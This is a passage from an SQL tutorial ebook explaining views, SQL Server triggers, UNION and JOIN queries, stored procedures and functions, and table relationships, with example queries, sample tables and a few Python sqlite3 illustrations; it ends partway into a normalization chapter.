Using the keyword WITH CHECK OPTION
WITH CHECK OPTION ensures that every INSERT and UPDATE made
through the view satisfies the view's WHERE condition; statements that
would violate it return an error instead of silently succeeding.
Example: CREATE VIEW “table_Name”_VIEW AS
SELECT “column_name1”, “column_name2”
FROM “table_name”
WHERE [condition]
WITH CHECK OPTION;
Applying this SQL statement to the same conditions (display name and city),
we can come up now with our WITH CHECK OPTION statement.
Example: CREATE VIEW EmployeesSalary_VIEW AS
SELECT Names, City
FROM EmployeesSalary
WHERE City IS NOT NULL
WITH CHECK OPTION;
The SQL query above ensures that rows with a NULL City never appear in
the view, and WITH CHECK OPTION prevents any INSERT or UPDATE
through the view from introducing one.
DROPPING VIEWS
You can drop your VIEWS whenever you don’t need them anymore. The
SQL syntax is the same as the main SQL statements.
Example: DROP VIEW EmployeesSalary_VIEW;
UPDATING VIEWS
You can easily replace a VIEW's definition by following the SQL query
pattern for the main queries.
Example: CREATE OR REPLACE VIEW “view_name” AS
SELECT “column_name”
FROM “table_name”
WHERE [condition];
DELETING VIEWS
The SQL syntax for DELETING rows through VIEWS is much the same as
DELETING DATA using the main SQL query. The only difference is the
name of the table.
If you use the VIEW table example above, and want to delete the rows
where the City is ‘New York’, you can come up with this SQL statement.
Example: DELETE FROM EmployeesSalary_VIEW
WHERE City = ‘New York’;
The SQL statement above would have this output:
EmployeesSalary
Names Age Salary City
Williams, Michael 22 30000.00 Casper
Colton, Jean 24 37000.00 San Diego
Anderson, Ted 30 45000.00 Laramie
Dixon, Allan 27 43000.00 Chicago
Alaina, Ann 32 41000.00 Ottawa
Rogers, David 29 50000.00 San Francisco
Lambert, Jancy 38 47000.00 Los Angeles
Kennedy, Tom 27 34000.00 Denver
INSERTING ROWS
Creating an SQL statement for INSERTING ROWS through a view follows
the usual INSERT syntax. Make sure the view includes all the NOT NULL
columns of the base table.
Example: INSERT INTO “table_name”_VIEW (“column_name1”)
VALUES (value1);
VIEWS can be utterly useful, if you utilize them appropriately.
To date in this EBook tables have been used to represent data and
information. Views are like virtual tables but they don’t hold any data and
their contents are defined by a query. One of the biggest advantages of a
View is that it can be used as a security measure by restricting access to
certain columns or rows. Also, you can use views to return a selective
amount of data instead of detailed data. A view protects the data layer while
allowing access to the necessary data. A view differs from a stored
procedure in that it doesn’t take parameters to carry out a function.
Encrypting the View
You can create a view without columns which contain sensitive data and thus
hide data you don’t want to share. You can also encrypt the view definition
which returns data of a privileged nature. Not only are you restricting certain
columns in a view you are also restricting who has access to the view.
However, once you encrypt a view it is difficult to get back to the original
view definition, so the best approach is to make a backup of the original
view first.
Creating a view
To create a view in SSMS expand the database you are working on, right
click on Views and select New View. The View Designer will appear
showing all the tables that you can add. Add the tables you want in the
View. Now select which columns you want in the View. You can now
change the sort type for each column from ascending to descending and can
also give column names aliases. On the right side of sort type there is Filter.
Filter restricts what a user can and cannot see. Once you set a filter (e.g.
sales > 1000) a user cannot retrieve more information than this view allows.
In the T-SQL code there is a line stating TOP (100) PERCENT which is the
default. You can remove it (also remove the order by statement) or change
the value. Once you have made the changes, save the view with the save
button, naming the view with the vw_ prefix. You can view the contents of
the view if you refresh the database, open Views, right-click on the view
and select Select Top 1000 Rows.
Indexing a view
You can index a view just like you can index a table. The rules are very
similar. When you build a view the first index needs to be a unique clustered
index. Subsequent non clustered indexes can then be created. You need to
have the following set to on, and one off:
SET ANSI_NULLS ON
SET ANSI_PADDING ON
SET ANSI_WARNINGS ON
SET CONCAT_NULL_YIELDS_NULL ON
SET ARITHABORT ON
SET QUOTED_IDENTIFIER ON
SET NUMERIC_ROUNDABORT OFF
Now type the following:
CREATE UNIQUE CLUSTERED INDEX ixCustProduct
ON table.vw_CusProd (col1, col2)
Chapter 11 Triggers
Sometimes a modification to the data in your database will need an automatic
action on data somewhere else, be it in your database, another database or
within SQL Server. A trigger is an object that will do it. A trigger in SQL
Server is essentially a Stored Procedure which will run performing the action
you want to achieve. Triggers are mostly used to ensure the business logic is
being adhered to in the database, performing cascading data modifications
(i.e. change on one table will result in changes in other tables) and keeping
track of specific changes to a table. SQL Server supports three types of
triggers:
DDL (Data Definition Language) triggers, which fire off in
response to a DDL statement being executed (e.g. CREATE,
ALTER or DROP). DDL triggers can be used for auditing or
limiting DBA activity.
Logon triggers are triggers that fire off when a session to the
instance is established. This trigger can be used to stop users
from establishing a connection to an instance.
DML triggers (Data Manipulation Language) are triggers
which fire off as a result of a DML statement (INSERT,
UPDATE, DELETE) being executed.
DDL Triggers
You can create DDL triggers at either the instance level (server scoped) or
the database level (e.g. tables being changed or dropped). You can create
DDL triggers that respond to all database level events at server level so that
they respond to events in all databases.
DDL triggers can provide a mechanism for auditing or limiting the DBA
which is useful when you have a team that needs certain (e.g. elevated)
permissions to databases. You can use these DDL triggers to carry out the
function a DBA would, very useful if you had a junior DBA on your team.
When a trigger is executing you have access to a function called
EVENTDATA(). This returns a well-formed XML document that includes
details such as the user who executed the original statement, so you can
inspect it to ensure everything is proper. DDL triggers can respond to CREATE,
ALTER, DROP, GRANT, DENY, REVOKE and UPDATE STATISTICS.
To create a DDL trigger you use the CREATE TRIGGER DDL statement.
The structure of a CREATE TRIGGER is the following:
CREATE TRIGGER <Name>
ON <Scope>
WITH <Options>
AFTER <EventType>
AS
<code>
ON - specifies the scope of the DDL trigger, there is ALL SERVER (instance
level) and DATABASE(level)
WITH – either ENCRYPTION (to hide the definition of the trigger) or
EXECUTE AS. EXECUTE AS takes one of the following: LOGIN, USER,
SELF, OWNER, CALLER. It allows you to change the security context of
the trigger, i.e. it allows you to change the permission level.
FOR or AFTER – either the FOR or AFTER keyword. Both are
interchangeable in this context. The trigger will execute after the original
statement completes.
AS – specifies that either the SQL statements that define the code body of the
trigger or the EXTERNAL NAME clause to point to a CLR trigger.
The following is an example of a DDL trigger which stops any user dropping
or altering any table on the server scope:
CREATE TRIGGER DDLTriggerExample
ON ALL SERVER
FOR DROP_TABLE, ALTER_TABLE
AS
PRINT 'If you want to alter/delete this table you will need to disable this
trigger'
ROLLBACK;
You can disable triggers using the DISABLE TRIGGER and enable triggers
with the ENABLE TRIGGER command. The following command disables
all triggers on the server scope:
DISABLE TRIGGER ALL ON ALL SERVER
Logon Triggers
Logon triggers are like DDL triggers except that instead of firing off in
response to a DDL event they fire off when a LOGON event occurs in the
instance. Logon triggers have an advantage over other logon event handling
in SQL Server in that they can stop the user from establishing a connection.
This is because it fires at the same time as the event as opposed to waiting for
it to complete.
This type of trigger is very useful when you want to limit the number of users
connecting to the instance. Say for example the server would be very busy in
the evening running jobs, the following example illustrates how you can limit
access to the instance from 6pm to midnight except for the sysacc account:
CREATE TRIGGER StopNightLogin
ON ALL SERVER
FOR LOGON
AS
BEGIN
IF (CAST(GETDATE() AS TIME) >= CAST('18:00:00' AS TIME)
AND CAST(GETDATE() AS TIME) <= CAST('23:59:59' AS TIME)
AND UPPER(ORIGINAL_LOGIN()) <> 'SYSACC')
ROLLBACK ;
END
DML Trigger
The most popular use for a DML trigger is to enforce a business rule. An
example of enforcing a business rule would be to ensure that there is enough
stock before a customer places an order or that the customer has enough
money in their account. You can use the DML trigger to enforce extra
validation like complex data checks that constraints can’t, or make changes in
another table based on what is about to happened in the original table. The
syntax for creating a DML trigger is the following:
CREATE TRIGGER triggerName
On Table
WITH ENCRYPTION
FOR INSERT, UPDATE, DELETE
AS
IF UPDATE(column) AND UPDATE(column)
COLUMNS_UPDATED()
SQL statements
The syntax largely follows the other trigger types except with the FOR
statement. This part of the syntax determines what action will execute. The
DML trigger can only specifically act on a data modification action which
can be only INSERT, UPDATE or DELETE. The trigger can fire on one, two
or three of these commands, depending on what you want the trigger to do.
The IF UPDATE(column) AND/OR UPDATE(column) test is used to check
whether a specific column has been modified. You will get a logical TRUE
or FALSE returned depending on whether the column has been updated.
If you delete a record it will not set UPDATE() to TRUE, as the row is
being removed rather than changed.
The COLUMNS_UPDATED() function is similar to UPDATE() but instead
tests multiple columns at once.
The SQL statements section is the code which you want to execute, just as
in any other stored procedure.
The following is an example of a DML trigger which execute when there has
been an INSERT, UPDATE or DELETE on the PersonTable
CREATE TRIGGER DMLTriggerExample
ON PersonTable
FOR INSERT, UPDATE, DELETE
AS
BEGIN
PRINT 'AFTER Trigger DMLTriggerExample has been executed!'
END
Now if you execute the above trigger and try to insert some values into the
table PersonTable with the following:
INSERT INTO dbo.PersonTable ( FirstName, LastName )
VALUES('Dovid','Malthe')
The trigger will be executed and you will receive the following messages in
SSMS
AFTER Trigger DMLTriggerExample has been executed!
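The example above is SQL Server (T-SQL) syntax. As a runnable illustration of the same idea, here is an AFTER INSERT trigger written for SQLite via Python's sqlite3 module; the AuditLog table and the message format are invented for this sketch:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE PersonTable (FirstName TEXT, LastName TEXT);
CREATE TABLE AuditLog (Message TEXT);

-- Fires after every INSERT on PersonTable; NEW refers to the inserted row.
CREATE TRIGGER DMLTriggerExample AFTER INSERT ON PersonTable
BEGIN
    INSERT INTO AuditLog
    VALUES ('Inserted: ' || NEW.FirstName || ' ' || NEW.LastName);
END;
""")

conn.execute("INSERT INTO PersonTable (FirstName, LastName) VALUES ('Dovid', 'Malthe')")
log = conn.execute("SELECT Message FROM AuditLog").fetchall()
print(log)    # [('Inserted: Dovid Malthe',)]
```

The trigger runs automatically as part of the INSERT; nothing in the inserting statement needs to know the audit table exists.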
Trigger order
You can create multiple triggers which respond to the same event and can
control which order in which they execute. You do this by using the
sp_settriggerorder stored procedure. It takes the following parameters:
@triggername – the trigger name which you want to execute first or last.
@order – takes values FIRST, LAST, NONE.
@stmttype – this is the type of statement that causes the trigger to fire. For
logon triggers it is the logon event, for DDL triggers it is any DDL event (but
you are not allowed to specify an event class). For DML triggers, the value
can be INSERT, UPDATE or DELETE.
@namespace – specifies the scope of the trigger. This can be specified as
SERVER, DATABASE or NULL. If NULL is passed, then it indicates that
the trigger is a DML trigger.
The following example sets off the EnsureLicense logon trigger before the
StopNightLogin trigger which was created in the previous example.
USE Master
GO
EXEC sp_settriggerorder @triggername='EnsureLicense', @order='First',
@stmttype='LOGON',
@namespace='SERVER'
EXEC sp_settriggerorder @triggername='StopNightLogin', @order='Last',
@stmttype='LOGON', @namespace='SERVER'
Chapter 12 Combining and Joining Tables
There will be times that you have to combine tables. This task can be more
complex than simply creating tables. But like everything that you do, the
difficulty is all in your mind. If you think you can, then you can. So, here it
goes.
The steps in combining tables are the following:
Step #1 – SELECT the columns you want to combine
You can indicate this with the SQL key word SELECT. This will display the
columns you want to combine.
Example: SELECT “column_name”, “column_name” FROM “table_name”
Step #2 – Add the keyword UNION
Add the key word UNION to indicate your intent of combining the tables.
Example: SELECT “column_name”, “column_name” from “table_name”
UNION
Step #3 – SELECT the other columns
Now, SELECT the other columns you want to combine with your first
selected columns.
Example: SELECT “column_name”, “column_name” FROM “table_name”
UNION SELECT “column_name”, “column_name” FROM “table_name”;
Step #4 – Use UNION ALL, in some cases
You can proceed to this step, in cases, when you want to include duplicate
data. Without the key word “ALL”, duplicate data would automatically be
deleted.
Example: SELECT “column_name”, “column_name” FROM “table_name”
UNION ALL SELECT “column_name”, “column_name” FROM
“table_name”;
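The effect of ALL on duplicates can be checked directly. A small sketch with Python's sqlite3 module and two invented city lists:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE offices (city TEXT);
CREATE TABLE warehouses (city TEXT);
INSERT INTO offices VALUES ('Denver'), ('Casper');
INSERT INTO warehouses VALUES ('Denver'), ('Laramie');
""")

# UNION removes duplicate rows ('Denver' appears once).
union = conn.execute(
    "SELECT city FROM offices UNION SELECT city FROM warehouses ORDER BY city"
).fetchall()
print(union)        # [('Casper',), ('Denver',), ('Laramie',)]

# UNION ALL keeps every row, duplicates included.
union_all = conn.execute(
    "SELECT city FROM offices UNION ALL SELECT city FROM warehouses"
).fetchall()
print(len(union_all))   # 4
```

Note that both queries need column lists that match in number and type; that rule holds across SQL dialects.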
Combining tables with the SQL statement SELECT and JOIN
UNION stacks the rows of similar queries on top of each other. When you
instead need to combine columns from related tables side by side, use the
keyword JOIN.
The same steps apply for these statements. Add the appropriate JOIN
keyword.
There are many types of JOIN SQL queries. These are:
INNER JOIN (SIMPLE JOIN) – This will return all rows from
the joined tables where the join condition is met. Rows with no
matching row in the other table are not displayed.
Example: SELECT “column1”, “column2” FROM “table_name1”
INNER JOIN “table_name2”
ON “table_name1”.”column” = “table_name2”.”column”;
Let’s say you have these two tables:
Table A
Students
StudentNo LastName FirstName Age Address City
1 Potter Michael 17 130 Reed Ave. Cheyenne
2 Walker Jean 18 110 Westlake Cody
3 Anderson Ted 18 22 Staten Sq. Laramie
4 Dixon Allan 18 12 Glenn Rd. Casper
5 Cruise Timothy 19 20 Reed Ave. Cheyenne
Table B
StudentInformation
StudentNo Year Average
1 1st 90
2 1st 87
3 3rd 88
4 5th 77
5 2nd 93
You may want to extract specified data from both tables. Let’s say from table
A, you want to display LastName, FirstName and the City, while from Table
B, you want to display the Average.
You can construct your SQL statement this way:
Example:
SELECT Students.LastName, Students.FirstName,
StudentInformation.Average
FROM Students
INNER JOIN StudentInformation ON Students.StudentNo=
StudentInformation.StudentNo;
This SQL query will display these data on your resulting table:
LastName FirstName Average
Potter Michael 90
Walker Jean 87
Anderson Ted 88
Dixon Allan 77
Cruise Timothy 93
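Using a trimmed-down version of the two tables (two students instead of five), the INNER JOIN above runs like this. The sketch uses Python's sqlite3 module for illustration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE Students (StudentNo INTEGER, LastName TEXT, FirstName TEXT);
CREATE TABLE StudentInformation (StudentNo INTEGER, Average INTEGER);
INSERT INTO Students VALUES (1, 'Potter', 'Michael'), (2, 'Walker', 'Jean');
INSERT INTO StudentInformation VALUES (1, 90), (2, 87);
""")

# Same join as in the chapter: match rows on the shared StudentNo key.
rows = conn.execute("""
    SELECT Students.LastName, Students.FirstName, StudentInformation.Average
    FROM Students
    INNER JOIN StudentInformation
        ON Students.StudentNo = StudentInformation.StudentNo
    ORDER BY Students.StudentNo
""").fetchall()
print(rows)   # [('Potter', 'Michael', 90), ('Walker', 'Jean', 87)]
```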
LEFT OUTER JOIN (LEFT JOIN) – This SQL statement will
display all rows from the left-hand table (table 1), even if these
do not match with the right-hand table (table 2).
With the ON key word, it will display only the rows specified. Data from the
other table will only be displayed, if the data intersect with the first selected
table.
Example: SELECT “column1”, “column2” from “table_name1”
LEFT (OUTER) JOIN “table_name2”
ON “table_name1”.”column” = “table_name2”.”column”;
Let’s use the two base tables above and create LEFT JOIN with the tables to
display the LastName and the Year. You can create your SQL statement this
way:
Example: SELECT students.LastName, StudentInformation.Year
FROM students
LEFT JOIN StudentInformation
ON Students.StudentNo = StudentInformation.StudentNo;
Your resulting table will appear this way:
LastName Year
Potter 1st
Walker 1st
Anderson 3rd
Dixon 5th
Cruise 2nd
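The difference from an INNER JOIN only shows when a left-hand row has no match; the right-hand columns then come back as NULL (None in Python). A small sqlite3 sketch with an extra, invented student who has no information row yet:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE Students (StudentNo INTEGER, LastName TEXT);
CREATE TABLE StudentInformation (StudentNo INTEGER, Year TEXT);
INSERT INTO Students VALUES (1, 'Potter'), (6, 'NewStudent');
INSERT INTO StudentInformation VALUES (1, '1st');
""")

# LEFT JOIN keeps every Students row; unmatched ones get NULL for Year.
rows = conn.execute("""
    SELECT Students.LastName, StudentInformation.Year
    FROM Students
    LEFT JOIN StudentInformation
        ON Students.StudentNo = StudentInformation.StudentNo
    ORDER BY Students.StudentNo
""").fetchall()
print(rows)   # [('Potter', '1st'), ('NewStudent', None)]
```

An INNER JOIN on the same data would drop the NewStudent row entirely.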
RIGHT OUTER JOIN (RIGHT JOIN) – This query will display
all the rows from the right-hand table (table 2). With the ON
keyword added, just like with the LEFT JOIN, it will display
only the rows specified.
This SQL statement will display all data from table 2, even if there are no
matches from table 1 (left table). Take note that only the data from table 1
that intersect with table 2 will be displayed.
Example: SELECT “column1”, “column2” from “table_name1”
RIGHT (OUTER) JOIN “table_name2”
ON “table_name1”.”column” = “table_name2”.”column”;
Let’s use the same base tables above, to facilitate viewing, the two base
tables are shown again on this page.
Table A
Students
StudentNo LastName FirstName Age Address City
1 Potter Michael 17 130 Reed Ave. Cheyenne
2 Walker Jean 18 110 Westlake Cody
3 Anderson Ted 18 22 Staten Sq. Laramie
4 Dixon Allan 18 12 Glenn Rd. Casper
5 Cruise Timothy 19 20 Reed Ave. Cheyenne
Table B
StudentInformation
StudentNo Year Average
1 1st 90
2 1st 87
3 3rd 88
4 5th 77
5 2nd 93
And you want to perform a RIGHT OUTER JOIN or a RIGHT JOIN.
Here’s how you can state your SQL query.
Example: SELECT Students.City, StudentInformation.Average
FROM Students
RIGHT JOIN StudentInformation
ON students.StudentNo = StudentInformation.StudentNo
ORDER BY Students.City;
Your result-table will appear like this:
City Average
Casper 77
Cheyenne 90
Cheyenne 93
Cody 87
Laramie 88
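Not every engine supports RIGHT JOIN (SQLite, for instance, only gained it in relatively recent versions). A portable equivalent is to swap the table order and use a LEFT JOIN instead. The sqlite3 sketch below uses trimmed, invented rows, including an information row with no matching student to show the NULL behaviour:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE Students (StudentNo INTEGER, City TEXT);
CREATE TABLE StudentInformation (StudentNo INTEGER, Average INTEGER);
INSERT INTO Students VALUES (1, 'Cheyenne'), (4, 'Casper');
INSERT INTO StudentInformation VALUES (1, 90), (4, 77), (9, 55);
""")

# "Students RIGHT JOIN StudentInformation" is the same as
# "StudentInformation LEFT JOIN Students": keep every right-hand row.
rows = conn.execute("""
    SELECT Students.City, StudentInformation.Average
    FROM StudentInformation
    LEFT JOIN Students
        ON Students.StudentNo = StudentInformation.StudentNo
    ORDER BY StudentInformation.StudentNo
""").fetchall()
print(rows)   # [('Cheyenne', 90), ('Casper', 77), (None, 55)]
```

Student number 9 has no Students row, so its City comes back as NULL, exactly what a RIGHT JOIN would produce.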
FULL OUTER JOIN (FULL JOIN) – This SQL keyword will
display all the rows from both the left-hand and right-hand
tables.
All data will be displayed by a query using these keywords. Take note that
NULLs appear wherever the join condition is not met in the joined tables.
Example: SELECT “column1”, “column2” from “table_name1”
FULL (OUTER) JOIN “table_name2”
ON “table_name1”.”column” = “table_name2”.”column”;
Using the two base tables above, you can create your SQL FULL JOIN
statement this way:
Example: SELECT Students.LastName, StudentInformation.Average
FROM Students
FULL JOIN StudentInformation
ON students.StudentNo = StudentInformation.StudentNo
ORDER BY Students.LastName;
This will be your table output:
LastName Average
Anderson 88
Cruise 93
Dixon 77
Potter 90
Walker 87
There are no NULL values in the columns because every row in both
tables matched.
CROSS JOIN – This SQL keyword combines each row from
table 1 with each row from table 2.
It is also called the CARTESIAN JOIN.
Example: SELECT * FROM “table_name1” CROSS JOIN “table_name2”;
Using the two base tables above, we can create a SQL statement this way:
Example: SELECT * from Students CROSS JOIN StudentInformation;
The output-table will contain every combination of the two tables’ rows;
with five rows in each table, that is 5 x 5 = 25 rows in all. The first few
combinations look like this:
StudentNo LastName FirstName Age Address City StudentNo Year Average
1 Potter Michael 17 130 Reed Ave. Cheyenne 1 1st 90
1 Potter Michael 17 130 Reed Ave. Cheyenne 2 1st 87
1 Potter Michael 17 130 Reed Ave. Cheyenne 3 3rd 88
...
Making use of this JOIN SQL syntax properly can save time and money. Use
them to your advantage.
Take note that when the WHERE clause is used, the CROSS JOIN becomes
an INNER JOIN.
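Both points can be checked quickly: the result size grows multiplicatively, and a matching WHERE condition collapses the Cartesian product to the inner-join result. A sqlite3 sketch with two invented five-row tables:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE a (n INTEGER);
CREATE TABLE b (n INTEGER);
INSERT INTO a VALUES (1), (2), (3), (4), (5);
INSERT INTO b VALUES (1), (2), (3), (4), (5);
""")

# Every row of a paired with every row of b: 5 x 5 = 25 rows.
cross = conn.execute("SELECT * FROM a CROSS JOIN b").fetchall()
print(len(cross))   # 25

# A WHERE clause matching the keys turns it into an inner join: 5 rows.
inner = conn.execute("SELECT * FROM a CROSS JOIN b WHERE a.n = b.n").fetchall()
print(len(inner))   # 5
```

This multiplicative growth is why an accidental CROSS JOIN (a forgotten join condition) on large tables can be so expensive.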
There is also another way of expressing your CROSS JOIN. The SQL can
be created this way:
Example: SELECT LastName, FirstName, Age, Address, City
FROM Students
CROSS JOIN StudentInformation;
There will be slight variations in the SQL statements of other SQL servers,
but the main syntax is typically basic.
Chapter 13 Stored Procedures and Functions
So far, we have covered how to build queries as single executable lines.
However, you can place a number of lines into what is known as a stored
procedure or function within SQL Server and call them whenever it is
required.
There are a number of benefits to stored procedures and functions beyond
code reuse, including better security, reduced development cost, consistent
and safe data, modularization, and shared application logic.
Stored procedures and functions are similar in that they both store and run
code, but functions are executed within the context of another unit of work.
T-SQL
T-SQL, or Transact Structured Query Language, is an extension of the
SQL commands that have been executed thus far in this EBook. T-SQL
offers a number of extra features that are not available in standard SQL,
including local variables and programming elements, which are used a lot
in stored procedures.
Creating a Stored Procedure
To create a stored procedure, you begin with the CREATE PROCEDURE
statement, after which you have access to the (as mentioned) additional
programming commands in T-SQL. The following is the syntax for creating
a stored procedure:
CREATE PROCEDURE procedureName
[ { @parameterName} datatype [= default_value] [OUTPUT]]
WITH RECOMPILE, ENCRYPTION, EXECUTE AS Clause
AS
BEGIN
SELECT * FROM tableName1
END
It’s best practice to give the procedure a descriptive name so it can be
referenced later; a prefix such as usp_ is common (avoid sp_, which SQL
Server reserves for system procedures).
The next thing to do is to define optional input and output parameter names.
Parameters are used to pass in information to a stored procedure. These are
prefixed by the @ symbol, must have a data type specified and you place
them in parentheses separated by commas. For example: @customerID
varchar(50).
There are a number of different ways in which you can execute the query.
You can specify Recompile to indicate that the database engine doesn’t cache
this stored procedure, so it must be recompiled every time it’s executed. You
can use the encryption keyword to hide the stored procedure so it’s not
readily readable. The EXECUTE AS Clause identifies the specific security
context under which the procedure will execute, i.e. control which user
account is used to validate the stored procedure.

After you declare the optional parameters you use the mandatory keyword
AS which defines the start of the T-SQL code and finishes with END. You
can use a stored procedure for more than just regular SQL statements like
SELECT, you can return a value which is useful for error checking.

Controlling the execution of the Stored Procedure
When you create a Stored Procedure, you often need to control the flow of
the T-SQL between the BEGIN and END statements when dealing with
more than one T-SQL statement. You can use the following: IF ELSE,
BEGIN END, WHILE BREAK and the CASE statement.
IF ELSE
Often you will use statements in a Stored Procedure where you need a
logical true or false answer before you can proceed to the next statement;
the IF ELSE statement facilitates this. To test for true or false you can use
>, <, = and NOT, along with testing variables. The syntax for the IF ELSE
statement is the following; note that only one statement is allowed between
each IF and ELSE:
IF X=Y
Statement when True
ELSE
Statement when False

BEGIN END

If you need to execute more than one statement in the IF or ELSE block, then
you can use the BEGIN END statement. You can put together a series of
statements which will run one after another, regardless of what was tested
before them. The syntax for BEGIN END is the following:

IF X=Y
BEGIN
statement1
statement2
END

WHILE BREAK

When you need to perform a loop around a piece of code X number of times
you can use the WHILE BREAK statement. It will keep looping until you
either break the Boolean test condition or the code hits the BREAK
statement. The first WHILE statement will continue to execute as long as the
Boolean expression returns true. Once its False it triggers the break and the
next statement is executed. You can use the CONTINUE statement which is
optional, it moves the processing right back to the WHILE statement. The
syntax for the WHILE BREAK command is the following:

WHILE booleanExpression
SQL_statement1 | statementBlock1
BREAK
SQL_statement2 | statementBlock2
Continue
SQL_statement3 | statementBlock3

CASE

When you have to evaluate a number of conditions and a number of
possible answers, you can use the CASE statement. The decision making is
carried out within an initial SELECT or UPDATE statement; then a CASE
expression (not a statement) is stated, whose outcome you determine with
WHEN clauses.
You can use a CASE statement as part of a SELECT, UPDATE or INSERT
statement.

There are two forms of CASE, you can use the simple form of CASE to
compare one value or scalar expression to a list of possible values and return
a value for the first match - or you can use the searched CASE form when
you need more flexibility to specify a predicate or mini-function as opposed
to an equality comparison. The following code illustrates the simple form:

SELECT column1
CASE expression
WHEN valueMatched THEN
statements to be executed
WHEN valueMatched THEN
statements to be executed
ELSE
statements to catch all other possibilities
END

The following code illustrates the more complex (searched) form; it is
useful for computing a value depending on the condition:
SELECT column1
CASE
WHEN valueX_is_matched THEN
resulting_expression1
WHEN valueY_is_matched THEN
resulting_ expression 2
WHEN valueZ_is_matched THEN
resulting_ expression 3
ELSE
statements to catch all other possibilities
END
The CASE statement works like this: each table row is put through each
CASE test and, instead of the column value being returned, the value from
the computation is returned instead.
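CASE expressions work the same way in most SQL dialects, so the searched form can be tried out directly. A sqlite3 sketch grading invented scores:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE scores (name TEXT, score INTEGER)")
conn.executemany("INSERT INTO scores VALUES (?, ?)",
                 [("Ann", 92), ("Bob", 74), ("Cid", 55)])

# Searched CASE: each WHEN holds a full predicate; the first true one wins.
rows = conn.execute("""
    SELECT name,
           CASE
               WHEN score >= 90 THEN 'A'
               WHEN score >= 70 THEN 'B'
               ELSE 'F'
           END AS grade
    FROM scores
    ORDER BY name
""").fetchall()
print(rows)   # [('Ann', 'A'), ('Bob', 'B'), ('Cid', 'F')]
```

Because the WHEN clauses are checked top to bottom, a score of 92 matches the first branch and never reaches the second, so the order of the branches matters.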

Functions

As mentioned, functions are similar to stored procedures, but they differ in
that functions (or User-Defined Functions, UDFs) can execute within
another piece of work – you can use them anywhere you would use a table
or column.
They are like methods, small and quick to run. You simply pass it some
information and it returns a result. There are two types of functions, scalar
and table valued. The difference between the two is what you can return
from the function.

Scalar Functions

A scalar function can only return a single value of the type defined in the
RETURN clause. You can use scalar functions anywhere the scalar matches
the same data type as being used in the T-SQL statements. When calling
them, you can omit a number of the function’s parameters. You need to
include a return statement if you want the function to complete and return
control to the calling code. The syntax for the scalar function is the
following:

CREATE FUNCTION schema_Name.function_Name
-- Parameters
RETURNS dataType
AS
BEGIN
-- function code goes here
RETURN scalar_Expression
END
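The syntax above is SQL Server's. As an analogy that you can actually run, SQLite lets a host program register a scalar UDF, which can then be called anywhere a scalar expression is allowed. The function name and tax arithmetic below are invented for the sketch:

```python
import sqlite3

conn = sqlite3.connect(":memory:")

# A Python function registered as a scalar SQL function named net_price.
def net_price(gross, tax_rate):
    # Strip the tax component from a gross amount, rounded to cents.
    return round(gross / (1 + tax_rate), 2)

# sqlite3's create_function(name, num_args, callable) makes it callable in SQL.
conn.create_function("net_price", 2, net_price)

result = conn.execute("SELECT net_price(120.0, 0.2)").fetchone()[0]
print(result)   # 100.0
```

As with a T-SQL scalar function, the call site just sees a single returned value of a fixed type.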

Table-Valued Functions

A table-valued function (TVF) lets you return a table of data rather than the
single value in a scalar function. You can use the table-valued function
anywhere you would normally use a table, usually from the FROM clause in
a query. With table-valued functions it is possible to create reusable code
frameworks in a database. The syntax of a TVF is the following:

CREATE FUNCTION function_Name (@variableName datatype)
RETURNS TABLE
AS
RETURN
SELECT columnName1, columnName2
FROM Table1
WHERE columnName > @variableName

Notes on Functions

A function cannot alter any external resource, a table for example. A
function needs to be robust; if an error is generated inside it, whether from
invalid data being passed in or from its own logic, it will stop executing
and control will return to the T-SQL which called it.
Chapter 14 Relationships
A database relationship is a means of connecting two tables together based on
a logical link (i.e. they contain related data). Relationships facilitate database
queries to be executed on two or more tables and they also ensure data
integrity.
Types of relationships
There exist three major types in a database:
One is to One
One is to Many
Many is to Many
One is to One
This type of relationship is pretty rare in databases. A row in a given table
X can have at most one matching row in another table Y. Equally, a row in
table Y can only have one matching row in table X. An example of a one is
to one relationship is one person having one passport.
One is to Many
This is probably one of the most prevalent relationships found in databases.
A row in a given table X will have several matching rows present in
another table Y; however, a row in the same table Y will only have a single
row that it matches in table X. An example is houses in a street: one street
has multiple houses, and a house belongs to one street.
Many is to Many
A row in a given table X will possess several matching rows in another
specified table Y, and vice versa. This type of relationship is quite frequent
where there are zero, one or even many records in the master table related
to zero, one or many records in the child table. An example of this
relationship is a school where teachers teach students: a teacher can teach
many students, and each student can be taught by many teachers.
Referential Integrity
When two tables are connected in a database and have the same information,
it is necessary that the data in both the tables is kept consistent, i.e. either the
information in both tables change or neither table changes. This is known as
referential integrity. It is not possible to have referential integrity with tables
that are in separate databases.
When enforcing referential integrity, it isn’t possible to enter a record in the
child (address) table that refers to a row which doesn’t exist in the linked
parent (customer) table (i.e. the one with the primary key). You need to
first create the customer record and then use its key to create the address
record.
Also, you can use what is known as a trigger and stored procedures to enforce
referential integrity as well as using relationships.
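A foreign key constraint is the usual way a database engine enforces this rule. The sketch below is a hypothetical example using SQLite via Python's sqlite3 module (SQLite requires PRAGMA foreign_keys to be switched on; the customer and address tables are invented to mirror the text):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("PRAGMA foreign_keys = ON")  # SQLite-specific: enable FK checks

conn.execute("""CREATE TABLE customer (
    customer_id INTEGER PRIMARY KEY,
    name TEXT NOT NULL)""")
conn.execute("""CREATE TABLE address (
    address_id INTEGER PRIMARY KEY,
    line1 TEXT,
    customer_id INTEGER NOT NULL REFERENCES customer(customer_id))""")

# The parent (customer) row must exist first...
conn.execute("INSERT INTO customer VALUES (1, 'Kathy Ale')")
conn.execute("INSERT INTO address VALUES (1, '12 Main St', 1)")  # accepted

# ...otherwise the insert is rejected, preserving referential integrity.
try:
    conn.execute("INSERT INTO address VALUES (2, '99 Oak Ave', 42)")  # no customer 42
except sqlite3.IntegrityError as e:
    print("rejected:", e)
```

MySQL enforces the same behavior with FOREIGN KEY clauses on InnoDB tables, without any pragma.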
Chapter 15 Database Normalization
In this chapter you will gain in-depth knowledge of normalization
techniques and their importance in improving database conceptualization and
